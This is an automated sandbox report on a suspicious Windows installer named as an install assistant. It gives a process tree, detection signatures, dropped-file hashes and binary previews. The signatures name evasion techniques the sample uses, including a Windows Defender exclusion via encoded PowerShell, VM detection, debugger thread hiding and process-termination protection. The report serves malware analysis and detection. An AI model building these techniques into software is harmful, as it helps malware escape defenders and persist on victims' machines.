behaviorgraph top1 signatures2 2 Behavior Graph ID: 1579603 Sample: #U5b89#U88c5#U52a9#U624b_1.... Startdate: 23/12/2024 Architecture: WINDOWS Score: 80 90 Found driver which could be used to inject code into processes 2->90 92 PE file contains section with special chars 2->92 94 AI detected suspicious sample 2->94 96 Sigma detected: Powershell Base64 Encoded MpPreference Cmdlet 2->96 10 #U5b89#U88c5#U52a9#U624b_1.0.8.exe 2 2->10         started        13 cmd.exe 2->13         started        15 cmd.exe 2->15         started        17 32 other processes 2->17 process3 file4 86 C:\...\#U5b89#U88c5#U52a9#U624b_1.0.8.tmp, PE32 10->86 dropped 19 #U5b89#U88c5#U52a9#U624b_1.0.8.tmp 3 5 10->19         started        23 sc.exe 1 13->23         started        25 sc.exe 1 15->25         started        27 sc.exe 1 17->27         started        29 sc.exe 1 17->29         started        31 sc.exe 1 17->31         started        33 28 other processes 17->33 process5 file6 72 C:\Users\user\AppData\Local\...\update.vac, PE32 19->72 dropped 74 C:\Users\user\AppData\Local\...\_setup64.tmp, PE32+ 19->74 dropped 98 Adds a directory exclusion to Windows Defender 19->98 35 #U5b89#U88c5#U52a9#U624b_1.0.8.exe 2 19->35         started        38 powershell.exe 23 19->38         started        41 conhost.exe 23->41         started        43 conhost.exe 25->43         started        45 conhost.exe 27->45         started        47 conhost.exe 29->47         started        49 conhost.exe 31->49         started        51 conhost.exe 33->51         started        53 27 other processes 33->53 signatures7 process8 file9 76 C:\...\#U5b89#U88c5#U52a9#U624b_1.0.8.tmp, PE32 35->76 dropped 55 #U5b89#U88c5#U52a9#U624b_1.0.8.tmp 4 16 35->55         started        100 Loading BitLocker PowerShell Module 38->100 59 conhost.exe 38->59         started        61 WmiPrvSE.exe 38->61         started        signatures10 process11 file12 78 C:\Users\user\AppData\Local\...\update.vac, PE32 55->78 dropped 80 C:\Users\user\AppData\Local\...\_setup64.tmp, PE32+ 55->80 dropped 82 C:\Program Files (x86)\...\trash (copy), PE32+ 55->82 dropped 84 3 other files (none is malicious) 55->84 dropped 102 Query firmware table information (likely to detect VMs) 55->102 104 Protects its processes via BreakOnTermination flag 55->104 106 Hides threads from debuggers 55->106 108 Contains functionality to hide a thread from the debugger 55->108 63 7zr.exe 2 55->63         started        66 7zr.exe 6 55->66         started        signatures13 process14 file15 88 C:\Program Files (x86)\...\tProtect.dll, PE32+ 63->88 dropped 68 conhost.exe 63->68         started        70 conhost.exe 66->70         started        process16

This section contains all screenshots as thumbnails, including those not shown in the slideshow.


windows-stand
SourceDetectionScannerLabelLink
#U5b89#U88c5#U52a9#U624b_1.0.8.exe0%ReversingLabs
#U5b89#U88c5#U52a9#U624b_1.0.8.exe6%VirustotalBrowse
SourceDetectionScannerLabelLink
C:\Program Files (x86)\Windows NT\7zr.exe0%ReversingLabs
C:\Program Files (x86)\Windows NT\is-RO25N.tmp0%ReversingLabs
C:\Program Files (x86)\Windows NT\tProtect.dll9%ReversingLabs
C:\Program Files (x86)\Windows NT\trash (copy)0%ReversingLabs
C:\Users\user\AppData\Local\Temp\is-O51CC.tmp\_isetup\_setup64.tmp0%ReversingLabs
C:\Users\user\AppData\Local\Temp\is-VGMC1.tmp\_isetup\_setup64.tmp0%ReversingLabs
No Antivirus matches
No Antivirus matches
No Antivirus matches
No contacted domains info
NameSourceMaliciousAntivirus DetectionReputation
https://aria2.github.io/Usage:#U5b89#U88c5#U52a9#U624b_1.0.8.tmp, 00000001.00000003.1772847528.0000000003E79000.00000004.00001000.00020000.00000000.sdmp, is-RO25N.tmp.5.drfalse
    unknown
    https://jrsoftware.org/ishelp/index.php?topic=setupcmdlineSetupU#U5b89#U88c5#U52a9#U624b_1.0.8.exefalse
      high
      https://github.com/aria2/aria2/issuesReport#U5b89#U88c5#U52a9#U624b_1.0.8.tmp, 00000001.00000003.1772847528.0000000003E79000.00000004.00001000.00020000.00000000.sdmp, is-RO25N.tmp.5.drfalse
        high
        http://www.metalinker.org/#U5b89#U88c5#U52a9#U624b_1.0.8.tmp, 00000005.00000002.1948621226.0000000004139000.00000004.00001000.00020000.00000000.sdmp, is-RO25N.tmp.5.drfalse
          unknown
          https://www.remobjects.com/ps#U5b89#U88c5#U52a9#U624b_1.0.8.exe, 00000000.00000003.1761774059.0000000002CC0000.00000004.00001000.00020000.00000000.sdmp, #U5b89#U88c5#U52a9#U624b_1.0.8.exe, 00000000.00000003.1762157926.000000007F08B000.00000004.00001000.00020000.00000000.sdmp, #U5b89#U88c5#U52a9#U624b_1.0.8.tmp, 00000001.00000000.1763590126.0000000000D71000.00000020.00000001.01000000.00000004.sdmp, #U5b89#U88c5#U52a9#U624b_1.0.8.tmp, 00000005.00000000.1779966941.000000000119D000.00000020.00000001.01000000.00000008.sdmp, #U5b89#U88c5#U52a9#U624b_1.0.8.tmp.0.dr, #U5b89#U88c5#U52a9#U624b_1.0.8.tmp.4.drfalse
            high
            https://aria2.github.io/#U5b89#U88c5#U52a9#U624b_1.0.8.tmp, 00000001.00000003.1772847528.0000000003E79000.00000004.00001000.00020000.00000000.sdmp, is-RO25N.tmp.5.drfalse
              unknown
              https://github.com/aria2/aria2/issues#U5b89#U88c5#U52a9#U624b_1.0.8.tmp, 00000001.00000003.1772847528.0000000003E79000.00000004.00001000.00020000.00000000.sdmp, is-RO25N.tmp.5.drfalse
                high
                https://www.innosetup.com/#U5b89#U88c5#U52a9#U624b_1.0.8.exe, 00000000.00000003.1761774059.0000000002CC0000.00000004.00001000.00020000.00000000.sdmp, #U5b89#U88c5#U52a9#U624b_1.0.8.exe, 00000000.00000003.1762157926.000000007F08B000.00000004.00001000.00020000.00000000.sdmp, #U5b89#U88c5#U52a9#U624b_1.0.8.tmp, 00000001.00000000.1763590126.0000000000D71000.00000020.00000001.01000000.00000004.sdmp, #U5b89#U88c5#U52a9#U624b_1.0.8.tmp, 00000005.00000000.1779966941.000000000119D000.00000020.00000001.01000000.00000008.sdmp, #U5b89#U88c5#U52a9#U624b_1.0.8.tmp.0.dr, #U5b89#U88c5#U52a9#U624b_1.0.8.tmp.4.drfalse
                  high
                  http://www.metalinker.org/basic_string::_M_construct#U5b89#U88c5#U52a9#U624b_1.0.8.tmp, 00000005.00000002.1948621226.0000000004139000.00000004.00001000.00020000.00000000.sdmp, is-RO25N.tmp.5.drfalse
                    unknown
                    No contacted IP infos
                    Joe Sandbox version:41.0.0 Charoite
                    Analysis ID:1579603
                    Start date and time:2024-12-23 05:05:07 +01:00
                    Joe Sandbox product:CloudBasic
                    Overall analysis duration:0h 9m 19s
                    Hypervisor based Inspection enabled:false
                    Report type:full
                    Cookbook file name:default.jbs
                    Analysis system description:Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
                    Number of analysed new started processes analysed:112
                    Number of new started drivers analysed:0
                    Number of existing processes analysed:0
                    Number of existing drivers analysed:0
                    Number of injected processes analysed:0
                    Technologies:
                    • HCA enabled
                    • EGA enabled
                    • AMSI enabled
                    Analysis Mode:default
                    Analysis stop reason:Critical Process Termination
                    Sample name:#U5b89#U88c5#U52a9#U624b_1.0.8.exe
                    renamed because original name is a hash value
                    Original Sample Name:_1.0.8.exe
                    Detection:MAL
                    Classification:mal80.evad.winEXE@144/32@0/0
                    EGA Information:
                    • Successful, ratio: 100%
                    HCA Information:
                    • Successful, ratio: 76%
                    • Number of executed functions: 66
                    • Number of non-executed functions: 74
                    Cookbook Comments:
                    • Found application associated with file extension: .exe
                    • Exclude process from analysis (whitelisted): Conhost.exe
                    • Excluded IPs from analysis (whitelisted): 172.202.163.200
                    • Excluded domains from analysis (whitelisted): ocsp.digicert.com, slscr.update.microsoft.com, otelrules.azureedge.net, ctldl.windowsupdate.com, dns.msftncsi.com, fe3cr.delivery.mp.microsoft.com
                    • Not all processes where analyzed, report is missing behavior information
                    • Report size exceeded maximum capacity and may have missing behavior information.
                    • Report size exceeded maximum capacity and may have missing disassembly code.
                    • Report size getting too big, too many NtCreateKey calls found.
                    • Report size getting too big, too many NtOpenKeyEx calls found.
                    • Report size getting too big, too many NtQueryValueKey calls found.
                    TimeTypeDescription
                    23:06:07API Interceptor1x Sleep call for process: #U5b89#U88c5#U52a9#U624b_1.0.8.tmp modified
                    23:06:10API Interceptor42x Sleep call for process: powershell.exe modified
                    No context
                    No context
                    No context
                    No context
                    MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                    C:\Program Files (x86)\Windows NT\7zr.exe#U8f6f#U4ef6#U5305#U5b89#U88c5#U7a0b#U5e8f_1.0.4.exeGet hashmaliciousUnknownBrowse
                      #U8f6f#U4ef6#U5305#U5b89#U88c5#U7a0b#U5e8f_1.0.4.exeGet hashmaliciousUnknownBrowse
                        ekTL8jTI4D.msiGet hashmaliciousUnknownBrowse
                          C:\Program Files (x86)\Windows NT\is-RO25N.tmp#U8f6f#U4ef6#U5305#U5b89#U88c5#U7a0b#U5e8f_1.0.4.exeGet hashmaliciousUnknownBrowse
                            #U8f6f#U4ef6#U5305#U5b89#U88c5#U7a0b#U5e8f_1.0.4.exeGet hashmaliciousUnknownBrowse
                              Process:C:\Users\user\AppData\Local\Temp\is-VIA1I.tmp\#U5b89#U88c5#U52a9#U624b_1.0.8.tmp
                              File Type:PE32 executable (console) Intel 80386, for MS Windows
                              Category:dropped
                              Size (bytes):831200
                              Entropy (8bit):6.671005303304742
                              Encrypted:false
                              SSDEEP:24576:A48I9t/zu2QSM0TMzOCkY+we/86W5gXKxZ5:Ae71MzuiehWIKxZ
                              MD5:84DC4B92D860E8AEA55D12B1E87EA108
                              SHA1:56074A031A81A2394770D4DA98AC01D99EC77AAD
                              SHA-256:BA1EC2C30212F535231EBEB2D122BDA5DD0529D80769495CCFD74361803E3880
                              SHA-512:CF3552AD1F794582F406FB5A396477A2AA10FCF0210B2F06C3FC4E751DB02193FB9AA792CD994FA398462737E9F9FFA4F19F095A82FC48F860945E98F1B776B7
                              Malicious:false
                              Antivirus:
                              • Antivirus: ReversingLabs, Detection: 0%
                              Joe Sandbox View:
                              • Filename: #U8f6f#U4ef6#U5305#U5b89#U88c5#U7a0b#U5e8f_1.0.4.exe, Detection: malicious, Browse
                              • Filename: #U8f6f#U4ef6#U5305#U5b89#U88c5#U7a0b#U5e8f_1.0.4.exe, Detection: malicious, Browse
                              • Filename: ekTL8jTI4D.msi, Detection: malicious, Browse
                              Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......9A..} ..} ..} ...<... ...?..~ ...<..t ...?..v ...?... ...(.| ..} ... ...(.t ..K.... ..k_..~ ..K...~ ..f."._ ...R..x ...&..| ..Rich} ..........PE..L....\.d.....................N......:.............@..........................@............@.....................................x........................&.......d......................................................H............................text.............................. ..`.rdata..RZ.......\..................@..@.data...ds... ......................@....sxdata.............................@....rsrc...............................@..@.reloc..2r.......t..................@..B................................................................................................................................................................................................................................................
                              Process:C:\Users\user\AppData\Local\Temp\is-VIA1I.tmp\#U5b89#U88c5#U52a9#U624b_1.0.8.tmp
                              File Type:data
                              Category:dropped
                              Size (bytes):249984
                              Entropy (8bit):7.999225319458047
                              Encrypted:true
                              SSDEEP:6144:9kdN1LFIJMjnJSkbZjcFs3hSU16LWlIHO+SgwcyyGYJ4:q1LFIejnJ7bZwY6LWwO+xby+S
                              MD5:A64035088C56F185A72562787F46C65F
                              SHA1:4F74D232C77E47AC1530157078AC3F010A5BE814
                              SHA-256:BA48ABC7A735A5C78CA4F103C9F7BC8DD65F9D08622B1AA0F8F2D32B64E7E93A
                              SHA-512:C532C5BA86285B52015A38303377FE17BBC279224F718EE329BBD39DC424269338CC712809432FBB2B785C97797A3991F1548413953592E7AC1D1BD8594A31F1
                              Malicious:false
                              Preview:.@S....%....,..............[E.J......W(b.7.N...gFd/...m ..H\..q..e.....G....>.*..`DAt...4W.....O......uj..Gm..R.'..P<W......o.u..{`,..5..F........T..d.<........o...'....R.M...a......Jdp....n....*}|x.6.....5..P<.7.v...F...J..8.....[..@E..-..m*.I.T.....J.:........(....nD....Xg.h..........-}`...k...$.~M.....)..o.].{..B..Rg...j.....Z.O....T.t)\.....Re=.U..Q.>...=....Z..6}p.....A..*CF..g..^.x.W..Nx9.`......9*.....e...X..>...7..<?......2...r.b.-..j.R.7.-.....XC..." ...!....U.UFfw...zlH....BLq....c".Z..V..+.&....b..%.z.W.b..v.s.0E..C.:k0..~..&..o....X....<..K".3:....,...oe....L.....4..j..3r.h<#..00.....Jr..../.HZi.u...e.{=.8..(,..}A.$L..........b...c..d..J..i.Q.4.8.....hX.<oL.-832.L|}Yw...Rt.V.}.&..F........'......l....Y.O.. ..c.&....;.@........(V...1........0..4....J.O.........*B......l..)Z...O.V....w.k.|m....9..xz+3.a...j.g<t..d2.f0.j..#y..P[.}.....{....km.vf,.{....;...c........3$.As.....l...:..%..4.3....h..N..*.........R....C^>t..lH.....
                              Process:C:\Users\user\AppData\Local\Temp\is-VIA1I.tmp\#U5b89#U88c5#U52a9#U624b_1.0.8.tmp
                              File Type:PE32 executable (DLL) (console) Intel 80386, for MS Windows
                              Category:dropped
                              Size (bytes):3598848
                              Entropy (8bit):7.004949099807939
                              Encrypted:false
                              SSDEEP:49152:OLI2LSDJWhsk/42oQ6C+NkdkcQdhjee71MzuiehWIKxZUQjOlwz+cxtVI8q29Zlc:OLVLAJG42oaPQdhCe71MzSRsyo29Al
                              MD5:1D1464C73252978A58AC925ECE57F0FB
                              SHA1:30E442BE965F96F3EB75A3ABDB61B90E5A506993
                              SHA-256:05184064FB017025E0704D75D199BAE02EBBD30AE4D76FB237DF9596CE6450AA
                              SHA-512:40165B34D6BC63472C3874AAC1FB25B19880F5DFE662F672181728732DC80503A64EF4A8058A410755A321D6BDB7314387464DD8243D6E912F37D5032177928A
                              Malicious:false
                              Preview:MZx.....................@...................................x...........!..L.!This program cannot be run in DOS mode.$..PE..L....gg...........!.....b..........%........................................p7...........@.........................HC.......J..<.... 7.X....................07.8?..........................x........................K...............................text...`a.......b.................. ..`.rdata..<............f..............@..@.data................\..............@....00cfg.......`(.......(.............@..@.tls.........p(.......(.............@....voltbl.F.....(...... (..................=~ .........(......"(............. ..`.rsrc...X.... 7.......6.............@..@.reloc..8?...07..@....6.............@..B................................................................................................................................................................................................................................................................................
                              Process:C:\Users\user\AppData\Local\Temp\is-VIA1I.tmp\#U5b89#U88c5#U52a9#U624b_1.0.8.tmp
                              File Type:data
                              Category:dropped
                              Size (bytes):249984
                              Entropy (8bit):7.999225319458047
                              Encrypted:true
                              SSDEEP:6144:9kdN1LFIJMjnJSkbZjcFs3hSU16LWlIHO+SgwcyyGYJ4:q1LFIejnJ7bZwY6LWwO+xby+S
                              MD5:A64035088C56F185A72562787F46C65F
                              SHA1:4F74D232C77E47AC1530157078AC3F010A5BE814
                              SHA-256:BA48ABC7A735A5C78CA4F103C9F7BC8DD65F9D08622B1AA0F8F2D32B64E7E93A
                              SHA-512:C532C5BA86285B52015A38303377FE17BBC279224F718EE329BBD39DC424269338CC712809432FBB2B785C97797A3991F1548413953592E7AC1D1BD8594A31F1
                              Malicious:false
                              Preview:.@S....%....,..............[E.J......W(b.7.N...gFd/...m ..H\..q..e.....G....>.*..`DAt...4W.....O......uj..Gm..R.'..P<W......o.u..{`,..5..F........T..d.<........o...'....R.M...a......Jdp....n....*}|x.6.....5..P<.7.v...F...J..8.....[..@E..-..m*.I.T.....J.:........(....nD....Xg.h..........-}`...k...$.~M.....)..o.].{..B..Rg...j.....Z.O....T.t)\.....Re=.U..Q.>...=....Z..6}p.....A..*CF..g..^.x.W..Nx9.`......9*.....e...X..>...7..<?......2...r.b.-..j.R.7.-.....XC..." ...!....U.UFfw...zlH....BLq....c".Z..V..+.&....b..%.z.W.b..v.s.0E..C.:k0..~..&..o....X....<..K".3:....,...oe....L.....4..j..3r.h<#..00.....Jr..../.HZi.u...e.{=.8..(,..}A.$L..........b...c..d..J..i.Q.4.8.....hX.<oL.-832.L|}Yw...Rt.V.}.&..F........'......l....Y.O.. ..c.&....;.@........(V...1........0..4....J.O.........*B......l..)Z...O.V....w.k.|m....9..xz+3.a...j.g<t..d2.f0.j..#y..P[.}.....{....km.vf,.{....;...c........3$.As.....l...:..%..4.3....h..N..*.........R....C^>t..lH.....
                              Process:C:\Users\user\AppData\Local\Temp\is-VIA1I.tmp\#U5b89#U88c5#U52a9#U624b_1.0.8.tmp
                              File Type:PE32+ executable (console) x86-64 (stripped to external PDB), for MS Windows
                              Category:dropped
                              Size (bytes):5649408
                              Entropy (8bit):6.392614480390128
                              Encrypted:false
                              SSDEEP:98304:jgRfP5jnFTyGZEWxSIBHVGT+t1ufqchZ:kRZDFTyGaHIJoWofqc
                              MD5:8C71B86BF407C05BAF11E8D296B9C8B8
                              SHA1:6624AB8CA883C48F02C58250D4EEE9E90098F4E4
                              SHA-256:BE2099C214F63A3CB4954B09A0BECD6E2E34660B886D4C898D260FEBFE9D70C2
                              SHA-512:BB3FEE727E40F8213F0A7D9808048E341295A684ECBA6F4DF52F1B07B528D7206CA41926B2433F4B63451565AD2854570FEE976BC7051B629ACD24FCA6D0F507
                              Malicious:false
                              Antivirus:
                              • Antivirus: ReversingLabs, Detection: 0%
                              Joe Sandbox View:
                              • Filename: #U8f6f#U4ef6#U5305#U5b89#U88c5#U7a0b#U5e8f_1.0.4.exe, Detection: malicious, Browse
                              • Filename: #U8f6f#U4ef6#U5305#U5b89#U88c5#U7a0b#U5e8f_1.0.4.exe, Detection: malicious, Browse
                              Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..d......................&.ZF..0V..<.............@..............................V.....L.V...`... ...............................................V../...........0O..............`V.\a...........................vL.(.....................V..............................text....XF......ZF.................`..`.data....z...pF..|...^F.............@....rdata.. 9....F..:....F.............@..@.pdata.......0O.......O.............@..@.xdata........Q.......Q.............@..@.bss.....;....U..........................idata.../....V..0....U.............@....CRT....h....@V.......U.............@....tls.........PV.......U.............@....reloc..\a...`V..b....U.............@..B................................................................................................................................................................................................................
                              Process:C:\Program Files (x86)\Windows NT\7zr.exe
                              File Type:data
                              Category:dropped
                              Size (bytes):56546
                              Entropy (8bit):7.996777007999937
                              Encrypted:true
                              SSDEEP:1536:3DbuN+GJMhUDzY3H8ciDYfgCK5X9Ide3hUXpCSu1+MfQO22:n2jMhozKH8vxtz3hakSYKV2
                              MD5:21277A248DF0E02C5F19F6CE5D521AA7
                              SHA1:035E6CD46BD766745BE5AB7089ECCDC97DD8943A
                              SHA-256:F1F20D52717F38F69963E54A4C4F260232085481AE798D8AEC6568514E14CD25
                              SHA-512:D487B5FF112ECFA7AB22B63488626AFE0AFFD6334C1A6874AA279A9EF4D5DD9A3EED11126FAC6FFC4A36F1EBC71F0B0C04A9DA0CBCE78BD519D59149D9B9E707
                              Malicious:false
                              Preview:.@S........l ................@[..h.;...j.....A9.V...\dZ.n.-.Z.O.z.j.M.....^K.>".;...m...;.H).@...#"K....I.OD...j...r...e. 3.....!.m.....Bd@7.|^7.5lJ._0....I..%Y0.5~...3..'..B.$.F..[.]z......9... .~.H..t}..I...F.#=.*.D..J...x......O'..=.HU.z..n.. k.-T&..<|.E1OGb2H.C..#LS..*'....6....#x....xM.J.H0..{..i.p..!.......6..N.w.CO.'+..6xK.a%.:.....X.A..\JW..}....u.#......."0t...g+a|..GZ.R........yDf9J....Tf..!)l|......1u@.V.o.|I...l...8a..+D<7.9.....@.e..S].t#..Q...{..g..2...P.......%.....C...w..V..`.m.w.S.a}.bx...V.,.....a..CnS)....v.I. ).a.N...}.]Q.W.T.3..*....G..X....Ki..^..q...;..rs.z:...lw...IN.V|....Q...>M9..9.d.....w._.E.}.CQ...}..9.9.....w.U.Z...j......6qi.e].9O?N.5..N.\7m@..R........m._......`...tr...L...t.Q7...U=..{./.B.....,&.\"@=..Tw..u..r.S.R2.R.R...G..?.u..A.......6kZ..a..o....5.@.a....=.|JaM.1.WQ...I.L./..g..\.#...ZENrz..,...@w$.A..a..5..3?.sr..L.W..~g.....7....s........i0i....,/....9..EUT....&...u.e.m.......82n.. ;...x.p..
                              Process:C:\Users\user\AppData\Local\Temp\is-VIA1I.tmp\#U5b89#U88c5#U52a9#U624b_1.0.8.tmp
                              File Type:7-zip archive data, version 0.4
                              Category:dropped
                              Size (bytes):56546
                              Entropy (8bit):7.996777007999922
                              Encrypted:true
                              SSDEEP:768:L6bKOYcy4jS9yw4oUsfgv+8jlHhJfjqYiyS28kOPyEMtLqDdRGkcz3em7QSrB4HU:ObKH74wyw4ozf+5hjqZWx/uXKz3dEHYL
                              MD5:B5AD685CF42B8BB1B42D0B527BE51424
                              SHA1:8A064DCF6460DD874433DB2522D538944A509537
                              SHA-256:B1DCBB750AD95EFCAA8A1C03E0F8C8CEE95776ACDBAF21BBD6B37D19DCA7EFB9
                              SHA-512:46BD15FF8BB3FE2301DE5B10799BF5CF9550D0F3DC83CDEFC57D24A46FD9475271CC548AB705E50B93A07C17ADEDF19EA0E468100058DF894D193A249B7AFB84
                              Malicious:false
                              Preview:7z..'..."0 .........2.......`\.....y.x.;.d..+l.Z..N.,b(1...3.6.....;.t.o.f.sX\..-.....rR.Sf[....Z........l?f.W..x..........^..L|.w.R....3&Xys.............EF..1v...h...F...'k..*@....Y.m.......Yd4..,A.....g..1.. !.A.4.}..$..h..#I+.....Dx.....^....Z..Vl.B...:B.. .......(....O...+.A... .~.z.. ..6H.1u...Z/.(!W.V.%..D..."n.^.#<...D..;..P?.......&..f3....?....c.|.'.Z.as1..93...|G...XJ..A.b.G..2k.8M....m...T..f+.....EU.2........Be..P=j.Mf.....>I\..M.7V.`....@6.*F.9..Gz/..j.A{p..\.D.5y...O.. .v+...`.]n.....6.}......].,.x....g.......iQ...@....R./w.l"..l....o.q.5c9.Tdd?.%Yk.b.. ...?.....*...~g<..w.....Z..'....R..).s.U)...rC...zj'JW....l.2M....y.2.^..p.{v<i...E.s,.Rar...V..."..^.hz.s...tY...>j.y.]...7..d.....;..0.B.N ..1...p...)g..O.U..oF.[..9R... ?Z...L.8..F.#....8M..B..2..\.N .v.Ku.Xe..Vm..o.b..2.a.A.OM.../.......\..tI..&...0eh.uQ.A.jIY......-.bH..`...._@.@&..s..t......du...Av..em.>._Z..3m...O.W..R]ub..o.Ew.,2.....G.....4.).@./Zm.i.X.E..(+....5Q.g.q*
                              Process:C:\Program Files (x86)\Windows NT\7zr.exe
                              File Type:data
                              Category:dropped
                              Size (bytes):56546
                              Entropy (8bit):7.996966859255975
                              Encrypted:true
                              SSDEEP:1536:crCPEbYP46GiC3q6cGOlLvjmS9UWgvy/F2QFtTVAe:iCIR913q8wjmS9bhKe
                              MD5:CEA69F993E1CE0FB945A98BF37A66546
                              SHA1:7114365265F041DA904574D1F5876544506F89BA
                              SHA-256:E834D26D571776C889E2D09892C6E562EA62CD6524D8FC625E6496A1742F5DBB
                              SHA-512:4BCBB5AD50446CD4FAD5ED3C530E29CC9DD7DDCB7B912D7C546AF8CCF7DA74BC1EEC397846BFB97858BABC9AA46BB3F3D0434F414BBC3B15B9FDBB7BF3ED59F9
                              Malicious:false
                              Preview:.@S....c...l ...............3...Q...R]..u&.(..c...o.A..q?oIS.j..O[..o..&....L)......Rm.jC,./....-=...Z.;..7..tH..f...n#.7.P#..#o..D..y....m........zH.!...M.|......Vs.^.Rb.X`....y.T.Sg....T.....E.?/.H.;h.)P.#.pz.LOG$..."L(.....?.D*.6g.J!.>.....f.....J..B..q...;w]9.v...V...$....L/m.H#..]...G....QQ..'.z.!NW~..R..y....E.)....m.k%....+....>....02../..M....b.l..f7..f?-~_..E.5.~....*.'....8?.n........x...#....9.........q.q.n...\....D.Uv9.9...P.j7P~q9[BV...>C..[F..k-UL(jfT..\..{d.v;.5.e.fb.3^+...Z|]S3G...$..H=.W..c...B...).v.D!...s...+.K...~=..l.2...X.m.-....m0.....p...>...d......e.J..gUr*4....vw.........T.cQ......\...]...Z{..q..n..'Ql.$..V.U9..j 4...9<..6i.....5.F.).k.LQ4.H...2..p.*.bQJ..4.K'C...#.%"q.u../zoXL...L...........'..g11=E.....y.8...~.Oe..X....u.M8.T.....Qq.m.........i....F.4e.([Hm.*...E....2........s. *R..{."4.x.]...-.....xQ@.z.......Bz.).[..C...T..".....q............M.X..CQ..A..........d...`S.3...e.X.....u.>.!..;k...>..
                              Process:C:\Users\user\AppData\Local\Temp\is-VIA1I.tmp\#U5b89#U88c5#U52a9#U624b_1.0.8.tmp
                              File Type:7-zip archive data, version 0.4
                              Category:dropped
                              Size (bytes):56546
                              Entropy (8bit):7.996966859255979
                              Encrypted:true
                              SSDEEP:1536:cWsX30GkPK2rw7bphKKdxDBxjqtalDFMflaX4:cZXhkPhr+TRJqtaK
                              MD5:4CB8B7E557C80FC7B014133AB834A042
                              SHA1:C42E2C861FF3ED0E6A11824E12F67A344E8F783D
                              SHA-256:3EC6A665E7861DC29A393D00EAA00989112E85C6F1B9643CA6C39578AD772084
                              SHA-512:A88E78258F7DB4AECD02F164E6A3AFCF39788E30202CF596F9858092027DDB2FDB66D751013A7ABA5201BFAFF9F2D552D345AFE21C8E1D1425ABBC606028C2E6
                              Malicious:false
                              Preview:7z..'....O; ........2.......D.X..Z.2..7nf..R..s# s..v.f.....%G..>..9..Jh.-j.r..q.2.=v..Q.....SW7....im..|.c...&...,.s....f.h...C.g~..f.7=9...,...sd....iD......cR.^...$..<....nd...S.O..E)0..SQ.AA.C..$.D.|. a.:..5.....b.....2......W.....Z.pS.b/.F.;|`...O/....@.......4.".b.(...4...,..h/.K$..r!...."..`.S...D?.":...n..f.{C..t..,/.S.0.N..M...v...(.Yn..-.)..-...N~....}..).. .j!...1H.7?R..X.....rKi....9.i[k..+.....Br\.=.k.t8...6Lmh.../.V^K.f.......*.@MM..`...,W.......E..v.H....0.W..~....I.....w....<....X.Azl.FH..6\.a..E?=..I.q.5...s...;.,J.0..J.../.w..,..n.EkN..,j....f.y&q.C}fnY..2\......0.....N!.J..H.H0.....BJ.Q..v}=......^c.'w..#...d.T1....#...2s}N.....2.%.?. ....l.).....a<5Y.s....}...2*.#s..]0h..._G....3].....7y.}.B.6...ywE....'q.....h..?p .#..Emm2..F..| .M.Rv!.v.G....1L.Kx...T...".a6.%S0..g..7.......J.vjO.{.A....B@.c.y>}.....N.+....:.L=[....._.....Y.{....F..|.w.oX..t&[.....a\.M..2.Qe.[}L.Ch[...G.S#.$9...8<..W.d1...*PH.`.....4.A.......?..g.
                              Process:C:\Program Files (x86)\Windows NT\7zr.exe
                              File Type:data
                              Category:dropped
                              Size (bytes):31890
                              Entropy (8bit):7.99402458740637
                              Encrypted:true
                              SSDEEP:768:rzwmoD5r754TWCxhazPt9GNgRYpSj3PsQ4yVb595nQ/:vwmolXaT9abVzP1TC
                              MD5:8622FC7228777F64A47BD6C61478ADD9
                              SHA1:9A7C15F341835F83C96DA804DC1E21FDA696BB56
                              SHA-256:4E5C193D58B43630E16B6E86C7E4382B26C9A812D6D28905DD39BC7155FEBEE1
                              SHA-512:71F31079B6C3CE72BC7238560B2CBD012A0285B6A5AC162B18EAE61A059DD3B8DBCF465225E1FB099A1E23ED7BDDF0AAE4ED7C337A10DC20E0FEEC4BC73C5441
                              Malicious:false
                              Preview:.@S......................xi.\ .~.#..:}..fy?koGL^|kH.G...........x....Tg.Y.t....~^..".L.41.....R..|.....R...C.m(.M&...q.v.$..i..U.....).PY.......O.....~..p.u.Y.......{...5^q.|a.]..@DP".`Rz}...|N.uSW.......^..o...U..z...3...bH........p.......Y`..b.t.x.F^i.<.%.r.o..?w.Z..M.fI.!.a...Zsb.+.y..W...n.....;...........|.{.@Q.....#".M...4.A).#;..r...>E..]w{.-....B...........v..`...S...sY....h.Sa)...r.3.U;n8wXq.x...@^z...%8H.Zd._..f~.....u[..q$..%......C..../].rS.....".=..<o.<S....-^"..iIX..r...D.......k.P.e...U..n.]^p..pal....E.c..+..Gc..U?s.R...p...:>..v..o2..B.Hn..q...F..3.o...%.......C......*.V..|..2.J..i.r....|;T.C6).......a..~"K....Y.....]3.{{..N...X>.1.....:?....,..T+=s...............so.;....&....Q.\K..b............k,..#l...Yb...VE.g.3v.$'.H3......w.....{f..e.....PS.tQ..*.8a....5w....\8%..c.;......q.j.t0/.8s..(9....... .S...0.o.o......f*..]....U..>N....Kc/..ka.I"O-O.!./..S".IN .....%G...........x%..ZL`Sq.;.}w.`..k.....F.........Tp..}..?t..
                              Process:C:\Users\user\AppData\Local\Temp\is-VIA1I.tmp\#U5b89#U88c5#U52a9#U624b_1.0.8.tmp
                              File Type:7-zip archive data, version 0.4
                              Category:dropped
                              Size (bytes):31890
                              Entropy (8bit):7.99402458740637
                              Encrypted:true
                              SSDEEP:768:jh43RfBLJT55mgLMoqX3gX/i69sXCuWegxJr8qF88M:qhj+I7qCKNSegPnFM
                              MD5:CE6034AFC63BB42F4E0D6CD897DFBCB8
                              SHA1:49E6E67EB36FE2CCAA42234A1DBB17AA2B1C7CC0
                              SHA-256:7B7EB1D44ED88E7C19A19CEDAA25855F6800B87EC7E76873F3EA4D6A65DAA25F
                              SHA-512:7801FA33C19D6504FF2D84453F4BB810FD579CB0C8772871F7CC53E90B835114D0221224A1743C0F5AAE76C658807CC9B4EC3BEC2CAD4AB8C3FD03203DAA7CF0
                              Malicious:false
